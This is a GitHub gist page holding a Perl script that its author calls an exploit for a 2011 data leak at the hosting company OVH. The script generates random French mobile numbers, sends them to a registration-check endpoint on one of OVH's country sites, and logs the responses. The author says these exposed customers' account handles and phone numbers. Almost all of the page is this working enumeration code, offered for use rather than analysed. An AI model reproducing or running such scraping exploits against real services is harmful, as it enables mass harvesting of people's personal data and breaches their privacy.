Last active
December 20, 2015 06:29
-
-
Save DamienChiboub/6085725 to your computer and use it in GitHub Desktop.
It's a Perl script created to exploit a #dataleak from ovh hoster. I was able to get Ovh.Users( Nic-Handles & GsmNumbers).
Weakness was on this script : ovh.com/fr/cgi-bin/newOrder/ajax-newOrderCheckCellPhone.pl reached by the register process.
Ovh-exploit.pl can be launched, but it's now returning errors.
It's also creating ovh-data.txt & ovh-d…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#-- Found in 2011 -- | |
#-- Ovh DataViewer Perl Script -- | |
#-- This Script Show the dataleak of the Ovh Register Process -- | |
#-- Start | |
#-- Step 1 Generate Random GSM number -- | |
#-- Step 2 Generate Random Target Selection by listed servers -- | |
#-- Step 3 Request the Generated Target/GSM -- | |
#-- Step 4 Store Result on ovh-data.txt or Issue on ovh-dbg.txt -- | |
#-- End | |
#-- Posted @ https://gist.github.com/DamienChiboub/6085725/ | |
#!/usr/bin/perl -W | |
use LWP; | |
use Switch; | |
#Step 1 | |
#gsm random generation | |
my $a = int(rand(9)); | |
my $b = int(rand(9)); | |
my $c = int(rand(9)); | |
my $d = int(rand(9)); | |
my $e = int(rand(9)); | |
my $f = int(rand(9)); | |
my $g = int(rand(9)); | |
my $h = int(rand(9)); | |
#gsmprinted | |
my $gsmprinted = "06.$a$b.$c$d.$e$f.$g$h"; | |
#gsmrequested | |
my $gsm = "$a$b$c$d$e$f$g$h"; | |
#Step 2 | |
#target random generation | |
my $rand = int(rand(14)); | |
switch ($rand) { | |
case 0 { $url = "https://www.ovh-hosting.fi" } | |
case 1 { $url = "https://www.ovh.de" } | |
case 2 { $url = "https://www.ovh.co.uk" } | |
case 3 { $url = "https://www.ovh.es" } | |
case 4 { $url = "https://www.ovh.fr" } | |
case 5 { $url = "https://www.ovh.com/fr" } | |
case 6 { $url = "https://ca.ovh.com/ca/en" } | |
case 7 { $url = "https://us.ovh.com/us" } | |
case 8 { $url = "https://www.ovh.pl" } | |
case 9 { $url = "https://www.ovh.it" } | |
case 10 { $url = "https://www.ovh.pt" } | |
case 11 { $url = "https://www.ovh.nl" } | |
case 12 { $url = "https://www.ovh.cz" } | |
case 13 { $url = "https://www.ovh.ie" } | |
case 14 { $url = "https://www.ovh.lt" } | |
else { print "previous case not true" } | |
} | |
print "\n"; | |
print "----------------------------------------------------------------------- \n"; | |
print "------------ Randomize Ovh TopLevelDomain Selector ----------- \n"; | |
print "\n"; | |
print ".fi .de .co.uk .es .fr .com .com/ca .com/us .pl .it .pl .nl .cz .ie .lt \n"; | |
print "\n"; | |
print "----------------------------------------------------------------------- \n"; | |
print "\n"; | |
print "Fqdn => $url \n"; | |
print "\n"; | |
print "Gsm => $gsmprinted \n"; | |
my $addr = "$url/cgi-bin/newOrder/ajax-newOrderCheckCellPhone.pl?cellphone=(+336$gsm) \n"; | |
print "Request $addr \n"; | |
print "\n"; | |
print "----------------------------------------------------------------------- \n"; | |
my $browser = new LWP::UserAgent; | |
#Step 3 | |
#request | |
my $request = new HTTP::Request( GET => "$addr" ); | |
my $headers = $request->headers(); | |
$headers->header( 'User-Agent','Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko)'); | |
$headers->header('Referer', '/'); | |
my $response = $browser->request($request); | |
#Step 4 | |
#storage | |
if ($response->is_success){ | |
my $headers = $response->headers(); | |
open (Data, ">>ovh-data.txt") || die "Open ovh-data.txt issue : $!"; | |
print Data "06$gsm "; | |
print Data "".$response->content. ""; | |
print Data " $addr \n"; | |
close Data || die "Close ovh-data.txt issue : $!"; | |
print "Downloaded \n"; | |
} else { | |
my $headers = $response->headers(); | |
open (Debug, ">>ovh-dbg.txt") || die "Open ovh-dbg.txt issue : $!"; | |
print Debug "06$gsm "; | |
print Debug "".$response->status_line. ""; | |
print Debug " $addr \n"; | |
close Debug || die "Close ovh-dbg.txt issue : $!"; | |
print "Bad Request \n"; | |
} | |
#-- https://gist.github.com/DamienChiboub/6085725/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment